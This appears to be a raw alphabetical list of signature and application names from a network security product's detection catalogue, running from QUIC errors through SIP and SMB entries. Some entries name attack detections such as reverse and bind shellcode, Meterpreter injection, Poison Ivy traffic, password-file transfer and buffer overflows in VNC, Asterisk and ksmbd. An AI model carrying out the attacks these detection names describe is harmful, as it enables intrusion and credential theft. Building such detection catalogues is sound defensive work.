QUIC_Server-Invalid-Operation
QUIC_Server-Invalid-Packet
QUIC_Server-Invalid-Stream-Operation
QUIC_Server-Invalid-Transport-Param
QUIC_Server-Packet-Error
QUIC_Server-Path-Probe-Error
QUIC_Server-Path-Validation-Error
QUIC_Server-Pkt-Num-Not-Available
QUIC_Server-Protocol-Error
QUIC_Server-Stream-Data-Blocked
QUIC_Server-Stream-Id-In-Use
QUIC_Server-Stream-Id-Not-Available
QUIC_Server-Stream-Limit-Exceeded
QUIC_Server-Stream-Not-Found
QUIC_Server-Stream-Send-Closed
QUIC_Server-Transport-Param-Error
QUIC_Server-Transport-Param-Missing
QUIC_Server-Unrecoverable-Error
Quill
Quinte-Computer-Services
QuintilesIMS
Quintiq
Quip
Quiz-Maker
Quizlet
Quora
Quote-Manager
Quote-Roller
Qvod
Qwaya
Qwilr
Qyule
Qzone
R.O.EYE
RAAS
Racked
Rackspace
Radgost
Radian6
Radio-Nova
Radio-NRJ
Radio-Rock
Radius
Radiusim
RADIX-IDC
Radmin
Radware
Rafter-Cloud-Stores
Rainforest-QA
RainKing
Rainmaker
RainWorx-Software
Rakuten
Rally
Ramco-Systems
Ramp-Systems
Rand
Rapid-Billing
Rapid-Modeling-Corporation
Rapid7
RapidShare
RapidSpike
RatesMate
RationalPlan
Rationalsurvey
Raven
Ravencloud
Ravox
Raygun
Raynet
Razer Synapse
Razorsight
RazorSync
RBackup
RBC-Direct-Investing
RCM-Technologies
Rdio
Rdm
Ready-Pro
ReadyPortal
ReadyTalk
Real Estate
Real-Cloud
Real-Games.com
Realex-Payments
Really-Simple-Systems
Realore-Studios
RealPage
RealTime-360
RealtimeBoard
REALTOR.org
Realtors-Property-Resource
Realtunnel
Realtylog
Reamaze-Cloud-Helpdesk
Rebel
RebelMouse
ReCaptcha
Recapture
Receiptful
Recommind
Recruitee
Recruiterbox
RecruitLoop
Recurly
Red-Bull-TV
Red-Hat
Red-Rocket
Redbooth
RedCritter
Reddit
Rediff.com
Redit2
Redknee
RedMap
Redmine
Redtail-CRM
Redtail-Imaging
Redtailsolutions
Redtube
Redworldwide
Reed.co.uk
Reeleezee
Reference Materials
Referral-EDGE
ReferralCandy
Refersion
Reflex-Appointment
Refresh policy for Internal Gateway to trust new VPN Certificate Authority
Register.com
Register4less
Registro.br
Regnum
RegOnline
Regression-Prediction
Regsvr32
Reid-Supply
Relenta
ReliaBills
Reliable-Runners
Reliance-Big-Rock
Religion
Remarkety
Remember-The-Milk
Remote Desktop Connection
RemoteCall
RemotePC
RemoteUtilities
Remoteview
Remotia
Remotia-CRM
Remsh.exe
Renaissance-Institutional
Renaissance-Learning
Renren
Renren-Apps
Renren-Instant-Messaging
Renren-Mail
Renren-Music
Renren-Posting
RenWeb
Replicon
reQall
Requirementone
RERUN
RES-Software
Rescuetime
Researchgate
ResellerRatings
Reservio
Resfly
Resource-Group
Resource-Guru
Resources consumption is safe.
Resources consumption on Log Server is safe.
Resources consumption on Management Server is safe.
Restaurants and Dining
ResumeWare
Retail-Solutions
Retailpoint
ReTargeter
Retention-Factory
Retirement-Plan-Consultants
ReturnPath
Reval
Revation
RevenueWire
ReverbNation
Revert
ReviewPad
Reviewsnap
Revinate
Revionics
Revolutionehr
Revulytics
RevX-Advanced-Billing-and-Customer-Care
Rezdy
Rezgo
RFB-Client-Bad-Handshake-Message-Sequence
RFB-Client-Bad-Security-Option
RFB-Client-Bad-Version
RFB-Client-Unknown-Version
RFB-Server-Unknown-Version
RFB_CS-Libvncserver-Rfbprocessclientnormalmessage-Divide-By-Zero-Denial-Of-Service
RFB_CS-Qemu-VNC-Set_Pixel_Format-Bits_Per_Pixel-Null-Pointer-Dereference
RFB_CS-RealVNC-Server-ClientCutText-Message-Memory-Corruption
RFB_CS-Suspicious-Request
RFB_CS-TurboVNC-Fence-Message-Stack-Based-Buffer-Overflow
RFB_SS-Libvnc-LibVNCClient-Heap-Based-Buffer-Overflow
RFB_SS-Libvncserver-LibVNCClient-Framebufferupdate-Rectangle-Heap-Buffer-Overflow
RFB_SS-Suspicious-Server-Response
RFB_SS-Tightvnc-Vncviewer-HandleCoRREBPP-Global-Buffer-Overflow
RFB_SS-Tightvnc-Vncviewer-Rfbservercuttext-Handler-Integer-Overflow
RFB_SS-UltraVNC-Authenticate-Buffer-Overflow
Rhapsody
RIA-Match
Rib-software
Ribose
RicohDocs
Riemurasia
Riff File
Right-Click
Right90
RightNow-Media
Rightscale
Rightsignature
Ring Central
RingCentral
Ringio
RingLead
RioLearn
Riot-Games
RIPE-Atlas
RIPng
Ripple-IT-Mgmt-Svc
Riptidecloud
Risk-Management-Solutions
riskcloud.NET
RiskVision
Riverbed
RJMetrics
RJS-Software
RLOGIN_Froot-Remote-Compromise
RLOGIN_Guest-Access
RLOGIN_Nobody-Access
RLOGIN_Root-Access
RLOGIN_System-V-Login-Buffer-Overflow
RM-Innovation
Roadmap
ROBO-SEO-Cart
Roboform
Robora
Robotron
Rocket-Lawyer
Rocket-Matter
Rocket.Chat
Rocketsoftware
Rockstar-Games
Rockstar-Games-GTA5
Roguewave
Roku
Rollbar
Rollbase
Roojoom
Room7
RosenPub
Rosslyn-Data-Technologies
Rotary-International
Rotten-Tomatoes
Roundcube
RouteOne-CAS-Login
Rovio
Rovio-Angry-Birds
RSA
RSA-eBusiness
RSH_CS-Cisco-Prime-Lan-Management-Solution-Remote-Command-Execution
RSH_CS-Cisco-Prime-Lan-Management-Solution-Remote-Command-Execution-2
RSH_CS-Login-Attempt
RSH_CS-Root-Login-Attempt
RSH_CS-Windows-RSH-Daemon-Buffer-Overflow
RSH_SS-Successful-Login
RSM
RSsoftware
RssReader
rstatd
Rsvp.com.au
Rsync
RTF File
RTMPT
RTP-Dynamic
RTSP
RTSP_Client-Request
RTSP_Client-Response
RTSP_Client-Syntax-Error
RTSP_CS-RealNetworks-Helix-Server-RTSP-Set_Parameter-Heap-Buffer-Overflow
RTSP_Invalid-Client-Method
RTSP_Invalid-Server-Method
RTSP_Server-Request
RTSP_Server-Response
RTSP_Server-Syntax-Error
RTSP_SS-Microsoft-Media-Player-Audio-Sampling-Rate-Memory-Corruption
RTSP_Stream-Destination-Not-Client
RTSP_Unknown-Client-Method
RTSP_Unknown-Server-Method
RTSP_Unknown-Version
Rubicon-Project
RubyGems
RumbleTalk
Rundll32.exe
Runescape
RunKeeper
RunMyProcess
Runnable
Runtastic
RuntimeBroker
Russia-Today
Rxproxy
Rynga
Rypple
Ryze
S-Pankki
S3group
S3Stat
Saastopankki
Saasu
Saba-Centra-Meeting
Saeker-Software
Safari-Books-Online
SafeCart
SafeCopy-Backup
Safenet
Safety-Concepts
Safety-In-Your-Hand
SafetyCulture
Safeway
Sage-ACT!
Sage-Virtual-Terminal
SageMathCloud
SailPlay
sailpoint
Salary.com
Sales-and-Orders
Sales-Engine
Salesboom.com
Salesforce File Download
Salesforce File Upload
Salesforce-Desk
Salesforce.com
SalesforceIQ
Salesformics
SalesFUSION360
Salesjunction
SALESmanago-Marketing-Automation
Salesnet
SalesNexus
Salespoint-Mobile-CRM
SalesSystemCRM
Salestrakr
Saleswah
Salsa-Labs
SAManage
Samepage
Samsung
Samsung Easy Printer
Samsung Magician
Samsung MIFAgent
Samsung-Apps
Samsung-Knox
San-Diego-County-Credit-Union
Sana-Commerce
Sandbox_Cannot-Connect
Sandbox_Connection-Acquired
Sandbox_Connection-Lost
Sandbox_File-Too-Big
Sandbox_File-upload
Sandbox_Getting-Completed-Tasks-Failed
Sandbox_Getting-Results-Failed
Sandbox_Unsupported-File-type
Sandbox_Uploading-File-Failed
Sandglaz
SanMar
Sanoma
Sanoma-Tasku
Santander
Santrax-Electronic-Visit-Verification
SAP
SAP-BI-OnDemand
SAP-Hana-Cloud
SAP-Hybris-Marketing-Convert
SAP-Sales-OnDemand
SAP-StreamWork
Sapenta
Saperion
Saprock
SAS
Satakunnan-Kansa
Satuit
Sauce-Labs
Savagebattle-For-Newerth
Save-Local-Now
SAVO
Savvis
SB-Nation
Sbs-Netv
ScaleXtreme
Scality
Scalr
Scan
ScanMarket
Scan_Completed
Scan_In-Progress
Scan_Interrupted-Policy-Install
Scan_Untrackable
SCCP_invalid_length_in_client_header
SCCP_invalid_message_direction
SCEP
Schawk
ScheduFlow
ScheduleAnywhere
ScheduleBase
ScheduleBull
ScheduleSmart
Scheduling
SchemeIt
Schlumberger
Schneider-Electric-DCIM
Schneider-Electric-eNet
SchoolDude
SchoolKeep
Schoology
SchoolsFirst-FCU
Schwab
Sciencelogic
sciquest
Scispace
Scoop.it
Scootle
Scorebuddy
ScorecardResearch
SCORM-Cloud
Scorpion-Software
Scottrade
Scout-Labs
Scrapetorrent
Screen9
Screencast
Screencast-O-Matic
ScreenConnect
ScreenSteps
Scribd
SCRIM
ScrumDo
SDK.Finance
SDL
SDS-Vault
SDSC-Cloud
SeaCloud
Seambox
SeamlessDocs
Search Engines and Portals
Searchfuse
Searchmetrics
Seattle-Clouds
SEC-Professionals-Group
Second-Life
Secret
SecureAuth
SecureDocs-Virtual-Data-Room
SecurePlan
SecureSafe
Secureserver-Webmail
SecureSync
Security
Securstore
SecuTransfer-Professional-Edition
Sedlauncher
Sedo
Seeburger
Seedpeer
SEEK
Seeqpod
Seesmic-Web
Segment
Seismic
SekiNdo
Selectica-CLM
SelfStir.com
Self_Test-Cryptography-Fail
Self_Test-Cryptography-Success
Self_Test-Fail
Self_Test-Success
SellerVantage
Selligent
Sellsy
Sem.-Project-Timer
Semba-Mobile
Send-Anywhere
Send-Invoice
Send2Fax
Send6
SendAnywhere
SenderScore
SendGrid
Sendible
Sendicate
SendinBlue
SendItOnTheNet
Sendloop
SendOutCards
Sendpepper
SendSpace
Sendthisfile
Senior.com
SensioLabs-Connect
Sent-SMS
Sentry
Sentry-EHS
Sentry.io
SEOshop-webshop-software
SEP-Networks
Sequence-Enterprise
Serena
SerGroup
Sertifi
ServCorp
Server-Density
Server-Intellect
Service and Philanthropic Organizations
ServiceLink
Servicem8
Servicemax
ServiceNow
ServicePattern
Servicepower
ServiceSource
Servimg.com
Servus
Session-Duplicate-Mac
SessionCam
SetMore-Appointments
Setster
Settings Synchronization
Setup_wm
Sex
Sex Education
SF-Fire-Credit-Union
Sfax
SFshare
SFTP_Command
SFTP_File_Open_Denied
SFTP_Request_Denied
Shape-5
Share-a-Refund
Share-it!
Shareaholic
Shared
Shared-groups
Shared-UDP_CS-BitTorrent-Network-Connect
Shared-UDP_CS-Metasploit-Shellcode-Mipsbe-Byte-Xori-Stub
Shared-UDP_CS-Metasploit-Shellcode-Mipsle-Byte-Xori-Stub
Shared-UDP_CS-Metasploit-Shellcode-PPC-Longxor-Stub
Shared-UDP_CS-Metasploit-Shellcode-Sparc-Longxor-Tag-Stub
Shared-UDP_CS-Metasploit-Shellcode-x86-Context-Cpuid-Stub
Shared-UDP_CS-Metasploit-Shellcode-x86-Context-Stat-Stub
Shared-UDP_CS-Metasploit-Shellcode-x86-Context-Time-Stub
Shared-UDP_CS-x86-X41nop-Shellcode
Shared-UDP_CS-x86-X90nop-Shellcode
Shared-UDP_Executable-File-Transfer
Shared-UDP_NSS-Boping
Shared-UDP_ShellCode-AIX-Execve
Shared-UDP_SunRPC-EMC-NetWorker-Librpc.dll-Security-Check-Bypass
Shared-UDP_System-Password-File-Transfer
Shared-UDP_TFTP-Usage
Shared-UDP_Yokogawa-CENTUM-Denial-Of-Service
Shared_Alpha-ShellCode-Detect
Shared_CS-100Bao-Query
Shared_CS-BitTorrent-Network-Connect
Shared_CS-BitTorrent-Tracker-Request
Shared_CS-Flash-Video-Upload
Shared_CS-Generic-Shellcode-3
Shared_CS-HTTP-Basic-Authorization-With-Long-Username-Or-Password
Shared_CS-Java-Rmi-Object-Deserialization-Code-Execution
Shared_CS-Java-Rmi-Object-Deserialization-Code-Execution-2
Shared_CS-Java-Rmi-Usage
Shared_CS-Metasploit-Meterpreter-Upload
Shared_CS-Metasploit-Shellcode-Mipsbe-Byte-Xori-Stub
Shared_CS-Metasploit-Shellcode-Mipsle-Byte-Xori-Stub
Shared_CS-Metasploit-Shellcode-PPC-Longxor-Stub
Shared_CS-Metasploit-Shellcode-Sparc-Longxor-Tag-Stub
Shared_CS-Metasploit-Shellcode-x86-Context-Cpuid-Stub
Shared_CS-Metasploit-Shellcode-x86-Context-Stat-Stub
Shared_CS-Metasploit-Shellcode-x86-Context-Time-Stub
Shared_CS-Suspicious-Windows-API-Stub
Shared_CS-System-Password-File-Transfer
Shared_CS-Universal-Plug-And-Play-Request
Shared_CS-Windows-Command-Prompt
Shared_CS-x86-X41nop-Shellcode
Shared_CS-x86-X61nop-Shellcode
Shared_CS-x86-X90nop-Shellcode
Shared_CS-XAR-File-Upload
Shared_EICAR-AntiVirus-Test-File
Shared_ELF-Executable-File-Download
Shared_Executable-File-Download
Shared_Executable-File-Upload
Shared_FTP-Long-Password
Shared_FTP-Long-TEST
Shared_Gid-Root-Response-Detect
Shared_HTTP-Proxy-Connect-To-HTTPS
Shared_HTTP-Proxy-Connects-To-SMTP
Shared_HTTP-Proxy-Connects-To-Suspicious-Port
Shared_HTTP-Proxy-Proxies-FTP-Connection
Shared_HTTP-Proxy-Proxies-Gopher-Connection
Shared_HTTP-Proxying-Detected
Shared_Juniper-JunOS-Backdoor-Password
Shared_Malicious-Function-Name-In-Script
Shared_Malicious-Metasploit-Function-In-Script
Shared_Malicious-VBScript-Execution
Shared_Microsoft-Cabinet-File-Download
Shared_MIPS-ShellCode-Detect
Shared_MS-SQL-Server-Pre-Authentication-Buffer-Overflow
Shared_Oracle-9i-XDB-FTP-Server-Unlock-BOF
Shared_PARISC-ShellCode-Detect
Shared_Possible-X86-Buffer-Overflow-Exploit
Shared_PPC-ShellCode-Detect
Shared_RTSP-Protocol-Usage
Shared_ShellCode-AIX-Execve
Shared_ShellCode-BSD-PPC-Execve
Shared_ShellCode-BSDi-Execve
Shared_ShellCode-BSDi-Execve-2
Shared_ShellCode-BSDi-Execve-Toupper-Evasion
Shared_ShellCode-DG-UX-Execve
Shared_ShellCode-FreeBSD-Execve
Shared_ShellCode-FreeBSD-Passive-Connect
Shared_ShellCode-HP-UX-Execve
Shared_ShellCode-Linux-PPC-Execve
Shared_ShellCode-Linux-Sparc-Setreuid-Execve
Shared_ShellCode-Linux-Sparc-Setreuid-Execve2
Shared_ShellCode-Linux-Sparc-Setreuid-Setregid-Execve
Shared_ShellCode-Linux-Sparc-Setreuid-Tolower-Execve
Shared_ShellCode-Linux-Sparc-Setuid-Execve
Shared_ShellCode-Linux-X86-Bind
Shared_ShellCode-Linux-X86-Chroot-Break-1
Shared_ShellCode-Linux-X86-Chroot-Break-2
Shared_ShellCode-Linux-X86-Chroot-Break-3
Shared_ShellCode-Linux-X86-Connect
Shared_ShellCode-Linux-X86-Drop-Shell
Shared_ShellCode-Linux-X86-Execve-0xff-Less
Shared_ShellCode-Linux-X86-Execve-Binsh-1
Shared_ShellCode-Linux-X86-Execve-Binsh-2
Shared_ShellCode-Linux-X86-Execve-Tolower-Evasion
Shared_ShellCode-Linux-X86-Execve-Toupper-Evasion
Shared_ShellCode-Linux-X86-File-Append
Shared_ShellCode-Linux-X86-Mini-Sh
Shared_ShellCode-Linux-X86-Portshell
Shared_ShellCode-Linux-X86-Reverse-Telnet
Shared_ShellCode-Linux-X86-SCC
Shared_ShellCode-Linux-X86-Setregid-Execve
Shared_ShellCode-Linux-X86-Tmp-Sh
Shared_ShellCode-Linux-X86-Write-1
Shared_ShellCode-Linux-X86-Write-2
Shared_ShellCode-Linux-X86-Xterm
Shared_ShellCode-NetBSD-Execve
Shared_ShellCode-OpenBSD-Passwd-Modify
Shared_ShellCode-OpenBSD-Portshell
Shared_ShellCode-OpenBSD-Reverse-Portshell
Shared_ShellCode-SCO-OpenServer-Chroot-Break
Shared_ShellCode-SCO-OpenServer-Execve
Shared_ShellCode-SCO-UnixWare-Execve
Shared_ShellCode-Solaris-Sparc-Portbind
Shared_ShellCode-Solaris-Sparc-Setreuid-Execve
Shared_ShellCode-Solaris-X86-Ingreslock
Shared_ShellCode-Solaris-X86-Setuid-Execve
Shared_ShellCode-Solaris-X86-Toupper-Execve
Shared_Sparc-ShellCode-Detect
Shared_SS-BitTorrent-Network-Connect
Shared_SS-BitTorrent-Tracker-Response
Shared_SS-DivX-Player-Subtitle-Parsing-Buffer-Overflow
Shared_SS-Flash-Video-Download
Shared_SS-Generic-Shellcode-Base64-Kernel32
Shared_SS-Metasploit-Meterpreter-Download
Shared_SS-Metasploit-Meterpreter-Injection
Shared_SS-Metasploit-Shellcode-Mipsbe-Byte-Xori-Stub
Shared_SS-Metasploit-Shellcode-Mipsle-Byte-Xori-Stub
Shared_SS-Metasploit-Shellcode-PPC-Longxor-Stub
Shared_SS-Metasploit-Shellcode-Sparc-Longxor-Tag-Stub
Shared_SS-Metasploit-Shellcode-x86-Context-Cpuid-Stub
Shared_SS-Metasploit-Shellcode-x86-Context-Stat-Stub
Shared_SS-Metasploit-Shellcode-x86-Context-Time-Stub
Shared_SS-OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption
Shared_SS-Poison-Ivy-Traffic
Shared_SS-Shared-Variables
Shared_SS-SOCKS4-Connection-Request-Accepted
Shared_SS-SOCKS4-Connection-Request-Failed
Shared_SS-SOCKS5-Connection-Request-Accepted
Shared_SS-SOCKS5-Connection-Request-Failed
Shared_SS-Suspicious-Windows-API-Stub
Shared_SS-System-Password-File-Transfer
Shared_SS-VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow
Shared_SS-Windows-Command-Prompt
Shared_SS-x86-X41nop-Shellcode
Shared_SS-x86-X90nop-Shellcode
Shared_SS-XAR-Archive-Download
Shared_SSH-Server-Detected-In-Nonstandard-Port
Shared_System-Uid-Response-Detect
Shared_TCP-CS-Hamachi-VPN-Logon
Shared_TCP-CS-SOCKS4-Connection-Request
Shared_TCP-CS-SOCKS5-Connection-Request
Shared_Uid-Response-Detect
Shared_Uid-Root-Response-Detect
Shared_Windows-Oracle-Response-Detect
Shared_Windows-Unicode-Volume-Response-Detect
Shared_Windows-Unicode-Volume-Response-Detect-2
Shared_Windows-Volume-Response-Detect
Shared_Windows-Volume-Response-Detect-2
Shared_X86-ShellCode-Detect
ShareMethods
Sharepoint
Shareprice-App
Sharesale-Affiliate
ShareThis
Sharethrough
ShareVault
Sharewise
SharpCloud
Sharpen
SharpSpring
Shazam
SHE-MIS
SheerID
Shein
Shell-Shockers
Shell_Abnormal-Stderr-Port
Shell_Stderr-Wrong-Direction
SHERM
Sherpa-Tools
ShieldSquare
Shifthub
Shinebox
Shintentsushin
ShinyStat
ShipStation
Shipwire
ShipWorks
Shockwave
Shodan
Shoebox
Shoeboxed
Shoora VPN
ShootQ
Shopathome
Shopboostr
ShopBuilder.ME
shopcloud
Shopcreator-Transact-Elite
Shopdaddy
ShopFactory
Shopify
ShopIntegrator
ShopKeep-POS
Shopp
ShopperTrak
ShopperTrak-Insights
Shopping
Shopping-Carts-for-Websites
Shoprocket
Shopseen
ShopSite
ShopSocially
ShopVisible
Shopware
ShoreTel-Sky-Portal
Shortmail
ShortStack
SHOUTcast
Shoutlet
ShoWare
Showbie
Showdocument
ShowingSuite
Showmypc
ShrinkTheWeb
Shutter-Stock
Shutterfly
ShuttleCloud
Sia
Sidekick
Siemens
Sierra-Wireless
Sifter
SigBuzz
Sigcheck.exe
Sight-Max
SightMaker
Sigma
Sign-Up-Genuis
Signal
SignalMind-(formerly-piJnz)
Signavio
Signiant-File-Sharing
SignNow
SIHClient
Silk
SilkRoad
SilverStripe
Simcorp
Simple
Simple-Sales-Tracking
Simple-site
SimpleECM
SimpleFeedback
SimpleKPI
Simplenote
SimplePay.ca
Simplicant
Simplifi-Compliance
Simplified-Aircraft-Maintenance
SimpliField
Simplify
Simplton
Simply-Hired
Simply-Measured
Simply-Safety!
Simply-Static
Simplybill
SimplyBook.me
SimplyCast
simplyCT
Simplyvoting
simPRO-Enterprise
Sina
Sina-UC
Sina-Weibo
Sina-Weibo-Posting
SingleHop
Sinkhole
SIP
SIP-TCP_Cisco-TelePresence-HTML-Injection-And-Memory-Corruption-Vulnerabilities
SIP-TCP_CS-Digium-Asterisk-File-Descriptor-Denial-Of-Service
SIP-TCP_CS-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow-2
SIP-TCP_CS-Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow
SIP-TCP_CS-Digium-Asterisk-SIP-Sscanf-Denial-Of-Service
SIP-TCP_Grandstream-GXV-3000-SIP-Phone-Remote-Eavesdropping
SIP-TCP_IBM-Lotus-Sametime-DoS
SIP-TCP_Malicious-Request
SIP-TCP_Non-SIP-Protocol-Seen-In-SIP-Port
SIP-TCP_TLS-Traffic-In-SIP-Module
SIP-UDP_AIM-Triton-CSeq-Buffer-Overflow
SIP-UDP_Asterisk-pjsip-Endpoint-Presence-Disclosure
SIP-UDP_Asterisk-SIP-Channel-Driver-Remote-Denial-Of-Service
SIP-UDP_Asterisk-SIP-Invite-Malformed-SDP-Denial-of-Service
SIP-UDP_Cisco-TelePresence-HTML-Injection-And-Memory-Corruption-Vulnerabilities
SIP-UDP_Cross-Site-Script-Encoder
SIP-UDP_CS-Digium-Asterisk-File-Descriptor-Denial-Of-Service
SIP-UDP_CS-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption
SIP-UDP_CS-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow-2
SIP-UDP_CS-Digium-Asterisk-SIP-Invalid-Response-Code-Denial-Of-Service
SIP-UDP_CS-Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow
SIP-UDP_CS-Ethereal-SIP-BOF
SIP-UDP_CS-Invite-Message-With-Broken-IP-Addresses
SIP-UDP_CS-Malicious-Request
SIP-UDP_Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution
SIP-UDP_Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service
SIP-UDP_Digium-Asterisk-pjsip-Channel-Driver-Register-Denial-Of-Service
SIP-UDP_Digium-Asterisk-pjsip-Stack-ACK-Denial-Of-Service
SIP-UDP_Digium-Asterisk-pjsip_Multipart_Parse-Denial-Of-Service
SIP-UDP_Digium-Asterisk-Res_pjsip_pubsub-Module-SIP-Subscribe-Type-Confusion-Denial-Of-Service
SIP-UDP_Grandstream-GXV-3000-SIP-Phone-Remote-Eavesdropping
SIP-UDP_IBM-WebSphere-Application-Server-SIP-Processing-Denial-Of-Service
SIP-UDP_Realtek-SDK-SIP-ALG-Buffer-Overflow
SIP-UDP_Suspicious-Message
SIP-UDP_Wireshark-SigComp-Buffer-Overflow-Vulnerability
Sipgate-UK
SIP_Asterisk-pjsip-Invalid-Fmtp-Media-Attribute-Denial-Of-Service
SIP_Call-Established
SIP_Call-Hang-Up
SIP_Digium-Asterisk-Cdr-Ast_Cdr_Setuserfield-Buffer-Overflow
SIP_Digium-Asterisk-Cdr_Object_Update_Party_B_Userfield_Cb-Buffer-Overflow
SIP_Digium-Asterisk-CSeq-Heap-Buffer-Overflow
SIP_Digium-Asterisk-pjsip-Contact-Header-Denial-Of-Service
SIP_Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service
SIP_Digium-Asterisk-Res_pjsip_pubsub-Out-Of-Bounds-Write
SIP_Empty-Contact-Header
SIP_Invalid-CSeq-Header
SIP_Message-Handled
SIP_Message-No-Transaction
SIP_Message-Parse-Error
SIP_Method-ACK
SIP_Method-BYE
SIP_Method-CANCEL
SIP_Method-INFO
SIP_Method-INVITE
SIP_Method-MESSAGE
SIP_Method-NOTIFY
SIP_Method-OPTIONS
SIP_Method-PRACK
SIP_Method-PUBLISH
SIP_Method-REFER
SIP_Method-REGISTER
SIP_Method-REGISTER-Without-Contact-Header
SIP_Method-SUBSCRIBE
SIP_Method-Unknown
SIP_Method-UPDATE
SIP_Response-100-Trying
SIP_Response-180-Ringing
SIP_Response-181-Call-Forwarded
SIP_Response-182-Queued
SIP_Response-183-Session-Progress
SIP_Response-200-OK
SIP_Response-300-Multiple-Choises
SIP_Response-301-Moved-Permanently
SIP_Response-302-Moved-Temporarily
SIP_Response-305-Use-Proxy
SIP_Response-380-Alternative-Service
SIP_Response-400-Bad-Request
SIP_Response-401-Unauthorized
SIP_Response-402-Payment-Required
SIP_Response-403-Forbidden
SIP_Response-404-Not-Found
SIP_Response-405-Method-Not-Allowed
SIP_Response-406-Not-Acceptable
SIP_Response-407-Proxy-Authentication-Required
SIP_Response-408-Request-Timeout
SIP_Response-410-Gone
SIP_Response-412-Conditional-Request-Failed
SIP_Response-413-Request-Entity-Too-Large
SIP_Response-414-Request-URI-Too-Long
SIP_Response-415-Unsupported-Media-Type
SIP_Response-416-Unsupported-URI-Scheme
SIP_Response-421-Extension-Required
SIP_Response-423-Interval-Too-Brief
SIP_Response-428-Use-Identity-Header
SIP_Response-429-Provide-Referrer-Identity
SIP_Response-430-Flow-Failed
SIP_Response-433-Anonymity-Disallowed
SIP_Response-436-Bad-Identity-Info
SIP_Response-437-Unsupported-Certificate
SIP_Response-438-Invalid-Identity-Header
SIP_Response-439-First-Hop-Lacks-Outbound-Support
SIP_Response-480-Temporarily-Unavailable
SIP_Response-481-Call-Or-Transaction-Does-Not-Exist
SIP_Response-482-Loop-Detected
SIP_Response-483-Too-Many-Hops
SIP_Response-484-Address-Incomplete
SIP_Response-485-Ambiguous
SIP_Response-486-Busy-Here
SIP_Response-487-Request-Terminated
SIP_Response-488-Not-Acceptable-Here
SIP_Response-489-Bad-Event
SIP_Response-491-Request-Pending
SIP_Response-493-Undecipherable
SIP_Response-494-Security-Agreement-Required
SIP_Response-500-Server-Internal-Error
SIP_Response-501-Not-Implemented
SIP_Response-502-Bad-Gateway
SIP_Response-503-Service-Unavailable
SIP_Response-504-Server-Time-Out
SIP_Response-505-Version-Not-Supported
SIP_Response-513-Message-Too-Large
SIP_Response-580-Precondition-Failure
SIP_Response-600-Busy-Everywhere
SIP_Response-603-Decline
SIP_Response-604-Does-Not-Exist-Anywhere
SIP_Response-606-Not-Acceptable
SIP_Shared-Variables
SIP_Spoofed-Bye-Request
SIP_TCP-Client-Syntax-Correct
SIP_TCP-Server-Syntax-Correct
SIP_UDP-Client-Syntax-Correct
SIP_UDP-Server-Syntax-Correct
Sirfin
SiriusXM
Sironta
Sisense
Sita
Site-Meter
Site24x7
Site5
Siteapps
SiteDirector-Shopping-Cart
SiteDocs
SiteGround
SiteHawk
Sitrion
Sizmek
Skatetalk-Home
Skilljar
Skillmeter
Skillotron
Skimlinks
Skire
Skorozvon
Skrill
Skubana
Sky-Go
Skyhigh-Networks
SkyLedger
Skylight
Skymid
Skype
Skype
SkyPrep
Skyrock
Skyscanner
Skytap
Slack
Slack
Slacker
SLAManagement
Slashdot
SlateBox
Sleek-Bill
Sleekr
Slickdeals
SlickDNS
Slickplan
Slide
Sliderocket
Slides
SlideShare
SlideShare-Upload
SlideShark
Sling TV
Slingbox.com
SlowDNS
Small-Improvements
Smallpdf
Smart-Turn
SmartAdServer
SMARTASSISTANT
SmartAuction
SmartBen
Smartbrief
SmartCart
SmartDraw
Smartertravel.com
Smartface
SmartFile
SmartFocus
Smartimage
SmartLead
Smartling
Smartly-io
SmartQ
SmartRecruiters
SmartScreen
Smartsheet
Smartsupp
SmartVault
SmartVoice
Smartytask
SmartZip
SMB
SMB-TCP_-Snort-DCE/RPC-Preprocessor-Stack-Based-Buffer-Overflow
SMB-TCP_Blackmatter-Ransomware-Remote-Encryption-Attempt
SMB-TCP_Breakingpoint-Generated-Negotiate-Protocol-Request-Message
SMB-TCP_CHS-Asn-1-Integer-BOF-MS04-007
SMB-TCP_CHS-Asn-1-Integer-BOF-MS04-007-2
SMB-TCP_CHS-Authentication-Attempt
SMB-TCP_CHS-Autodesk-Autocad-Request-To-Acad.FAS
SMB-TCP_CHS-Autodesk-Autocad-Request-To-Acdimres.dll
SMB-TCP_CHS-Autodesk-Autocad-Request-To-DWG-File
SMB-TCP_CHS-CA-BrightStor-Discovery-Service-CheyenneDS-Mailslot-Traffic-Detected
SMB-TCP_CHS-Check-Directory-Request
SMB-TCP_CHS-Close-Print-File-Request
SMB-TCP_CHS-Close-Request
SMB-TCP_CHS-Copy-Request
SMB-TCP_CHS-Create-Directory-Request
SMB-TCP_CHS-Create-New-Request
SMB-TCP_CHS-Create-Request
SMB-TCP_CHS-Create-Temporary-Request
SMB-TCP_CHS-Delete-Directory-Request
SMB-TCP_CHS-Delete-Request
SMB-TCP_CHS-Echo-Request
SMB-TCP_CHS-Find-Close-Request
SMB-TCP_CHS-Find-Close2-Request
SMB-TCP_CHS-Find-Notify-Close-Request
SMB-TCP_CHS-Find-Request
SMB-TCP_CHS-Find-Unique-Request
SMB-TCP_CHS-First-Class-Mailslot-Traffic-Detected
SMB-TCP_CHS-Flush-Request
SMB-TCP_CHS-Get-Print-Queue-Request
SMB-TCP_CHS-Invalid-Command-Request
SMB-TCP_CHS-IOCTL-Request
SMB-TCP_CHS-IOCTL-Secondary-Request
SMB-TCP_CHS-Linux-Kernel-Ksmbd-Compounded-Treeid-Validation-Information-Disclosure
SMB-TCP_CHS-Linux-Kernel-Ksmbd-Session-Key-Exchange-Heap-Buffer-Overflow
SMB-TCP_CHS-Linux-Kernel-Ksmbd-Setinfo-Request-Out-of-Bounds-Read-Information-Disclosure
SMB-TCP_CHS-Linux-Kernel-Ksmbd-SMB2-Logoff-Handling-Null-Pointer-Dereference
SMB-TCP_CHS-Lock-And-Read-Request
SMB-TCP_CHS-Lock-Byte-Range-Request
SMB-TCP_CHS-Locking-AndX-Request
